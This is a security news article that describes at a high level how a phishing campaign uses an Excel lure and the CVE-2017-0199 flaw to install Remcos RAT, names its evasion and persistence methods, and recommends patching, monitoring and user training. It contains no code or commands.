The Remcos RAT Trap: How Phishing Campaigns Are Exploiting Old Vulnerabilities for Remote Control

Remcos RAT trap Fortinet

The manipulation of remote administration tools (RATs) for cyberattacks is on the rise, with bad actors evading security measures to exploit known vulnerabilities. The dangers here are many, as leveraging RATs grants attackers high levels of access to the target’s device. One such attack is a phishing campaign recently spotted in the wild by Fortinet’s FortiGuard Labs, which takes advantage of a long-known Remote Code Execution (RCE) vulnerability in Microsoft Excel.

With a combination of social engineering tactics and vulnerability exploits, threat actors can gain access to target devices, endangering data and compromising users and devices. This campaign is alarming in how easily attackers can abuse legitimate tools like Remcos for malicious purposes, highlighting the need for robust security strategies.

How the Campaign Unfolds: From Phishing Email to Full Device Control

The initial point of entry for this campaign is a phishing email that contains a seemingly harmless Excel document purported to be an order file. Attackers use the name of a real company, citing the real company’s website as a legitimizing factor, to deceive and convince their targets. Claiming the document to be an order file incentivizes the target to open it as it represents a business opportunity.

When the recipient is persuaded to download and open the document to view the order, further infiltration is enabled. The Excel document contains an OLE object that initiates the next stage of the attack by exploiting the RCE vulnerability CVE-2017-0199.

Exploiting CVE-2017-0199: A Known Vulnerability as the Gateway

The CVE-2017-0199 vulnerability was discovered in 2017 and is still being leveraged by threat actors today. This vulnerability takes advantage of the way that Excel and other Microsoft Office tools read certain files. It downloads an HTA file in the background to execute it on the target device using mshta.exe, a Windows-native application. The file contains PowerShell code to perform an API call and download dllhost.exe, which extracts files and eventually leads to the installation of the Remcos malware.

Old vulnerabilities that have long been known and patchable can still present high levels of risk. Especially when it comes to frequently used applications like Microsoft Office tools, vulnerabilities that are allowed to go unpatched can provide bad actors with the entry point they need to launch an attack. This attack campaign highlights the importance of keeping all software up to date to prevent threats like this that exploit old vulnerabilities in new ways.

Anti-Detection Techniques: How Remcos Evades Security Measures

The anatomy of this attack campaign is incredibly complex, featuring anti-analysis techniques to obfuscate the malware and evade threat detection tools. This includes code hidden behind multiple layers of different script languages like JavaScript and VBScript and different methods of encryption like Base64-encoded and URL-encoded. The attack installs a vectored exception handler, dynamically and uniquely calls APIs, performs anti-debugging, and employs an API hooking technique and process hollowing to evade analysis.

With the use of PowerShell and DLL execution, the campaign achieves persistence, adding an auto-run item to maintain control over the target device even after it is restarted. These many techniques for obfuscation, deception, and persistence enable malicious actors to craft attacks that are difficult for traditional security tools to detect and block.

The Risks of Commercial RATs in Cybercrime

The Remcos RAT malware originated as a legitimate tool for remote administration known as Remote Control and Surveillance, but threat actors have found a number of ways over the years to repurpose it into a tool for their attacks. When a widely accessible RAT like Remcos is commercially available, it enables more bad actors to carry out attack campaigns like this one.

On the whole, the trend of threat actors leveraging legitimate tools for malicious purposes has significant implications for cybersecurity. When attackers use tools that many individuals and organizations employ for legitimate purposes, it can blur the lines between benign and malicious activity, making it more difficult for security teams and threat prevention tools to detect pressing risks.

Protective Measures: How to Defend Against RAT-Based Phishing Campaigns

Protecting against the dangers of phishing campaigns and RAT attacks requires a robust and layered defense strategy to account for the many different factors and moving parts involved in an attack like this. Regular software updates are crucial to patch vulnerabilities like CVE-2017-0199 that make the RCE possible and enable the deployment of the malware. As this campaign shows, even years-old vulnerabilities can be exploited in new ways and cause significant damage.

It is also important to implement tools for anti-phishing and behavioral monitoring functions. Organizations are encouraged to invest in sophisticated security solutions that can detect suspicious behavior indicating potential risks. Relying solely on traditional defenses, like tools that use known threat signatures to detect attacks, is less effective at preventing this type of attack.

User security awareness training is vital for all organizations as well. “Since the attack relies on convincing users to open documents, attackers can exploit human vulnerabilities, which is often easier than bypassing technical safeguards,” according to Jason Soroko, Senior Fellow at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM). Some tools include anti-phishing capabilities, but user education and awareness is also an essential part of any phishing prevention strategy. Continuous and regularly updated phishing awareness training should teach users of the dangers of phishing and how to identify and prevent phishing attacks.

Staying Ahead of Evolving Threats

This recent Remcos RAT phishing campaign highlights several important factors in threat trends: the dangers posed by attackers leveraging RATs, the importance of keeping software updated, and the evolution of phishing tactics to increase their efficacy. Organizations and individuals alike must be vigilant to the risk posed by phishing scams and take proactive steps to secure their systems against these threats.

Threat trends and cybersecurity technology are constantly evolving, and it is vital to invest in security practices and tools that are equipped to handle advanced and developing threats. Cybercriminal tactics and tools like phishing and malware campaigns are increasingly sophisticated as attackers continuously attempt to evade security measures. Security measures should be adaptable and scalable to maintain effectiveness over time.

Author
  • Contributing Writer, Security Buzz
    PJ Bradley is a writer from southeast Michigan with a Bachelor's degree in history from Oakland University. She has a background in school-age care and experience tutoring college history students.